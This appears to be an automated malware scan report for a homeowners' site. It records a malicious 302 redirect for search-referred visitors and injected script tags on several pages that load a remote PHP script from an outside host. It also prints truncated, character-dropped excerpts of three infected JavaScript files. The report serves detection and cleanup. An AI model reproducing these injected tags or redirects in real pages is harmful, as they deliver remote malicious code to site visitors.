Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://estatesatthomaslake.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: estatesatthomaslake.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Tue, 02 Sep 2014 11:51:20 GMT Location: http://reddeerhotyoga.ca/aeed.html?h=3358068 Server: Apache Content-Length: 301 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://estatesatthomaslake.com/ | 200 OK Content-Length: 7827 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732582"></script> | ||
http://estatesatthomaslake.com/page8.html | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://estatesatthomaslake.com/test404page.js | 404 Not Found Content-Length: 2881 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732590"></script> | ||
http://estatesatthomaslake.com/page9.html | 200 OK Content-Length: 7351 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732588"></script> | ||
http://estatesatthomaslake.com/wpscripts/jspngfix.js | 200 OK Content-Length: 5886 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(''); var supported = !/Gecko/.test(navigator.userAgent) && !/Opera/.test(navigator.userAgent) && /MSIE (5\.5)|[6]/.test(navigator.userAgent) && navigator.platform == "Win32"; function OnLoadPngFix() { if(!supported) return; if(!event.srcElement) return; var src=event.srcElement.src; if(!src) return; if(!new RegExp(blankSrc).test(src)) { if(/\.png$/.test(src.toLowerCase())) { src = src.replace(/\(/g, "(" ); pt>') /*/339810*/ Antivirus reports:
| ||
http://estatesatthomaslake.com/wpscripts/jsRollover.js | 200 OK Content-Length: 7254 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(''); rolls = new Array(); numRolls=0; function PPFindObj(n, d) { var p,i,x; if( !d ) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) { d=parent.frames[n.substring(p 1)].document; n=n.substring(0,p); } if( !(x=d[n])&&d.all ) x=d.all[n]; for( i=0;!x&&i<d.forms.length;i ) x=d.forms[i][n]; for( i=0;!x&&d.layers&&i<d.layers.length;i ) x=PPFindObj(n,d.layers[i].document); 810*/f27* Antivirus reports:
| ||
http://estatesatthomaslake.com/index.html | 200 OK Content-Length: 7827 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732582"></script> | ||
http://estatesatthomaslake.com/page3.html | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://estatesatthomaslake.com/page4.html | 200 OK Content-Length: 11142 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732584"></script> | ||
http://estatesatthomaslake.com/page8a.html | 200 OK Content-Length: 6685 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732587"></script> | ||
http://estatesatthomaslake.com/page7.html | 200 OK Content-Length: 10296 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732585"></script> | ||
http://estatesatthomaslake.com/wpscripts/jsValidation.js | 200 OK Content-Length: 6638 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(''); function ValidateEmail(sEmail) { var reEmail=/^(. )@(. )$/; var reQuotedString="(\"[^\"]*\")"; var reIPDomain=/^\[(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\]$/; var reValidCharString="\[^\\s\\(\\)><@,;:\\\\\\\"\\.\\[\\]\] "; var reGetString="(" reValidCharString "|" reQuotedString ")"; var reUserName=new RegExp("^" reGetString "(\\." reGetString ")*$"); var reDomain=new RegExp("^" reValidCharString "(\\." reVa a5f* Antivirus reports:
| ||
http://estatesatthomaslake.com/CCR1.pdf | 200 OK Content-Length: 300869 Content-Type: application/pdf | clean |
http://estatesatthomaslake.com/CCR2.pdf | 200 OK Content-Length: 90909 Content-Type: application/pdf | clean |
http://estatesatthomaslake.com/MINUTES 10-26-09.doc | 200 OK Content-Length: 61952 Content-Type: application/msword | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=estatesatthomaslake.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://estatesatthomaslake.com/
Result: estatesatthomaslake.com is not infected or malware details are not published yet.
Result: estatesatthomaslake.com is not infected or malware details are not published yet.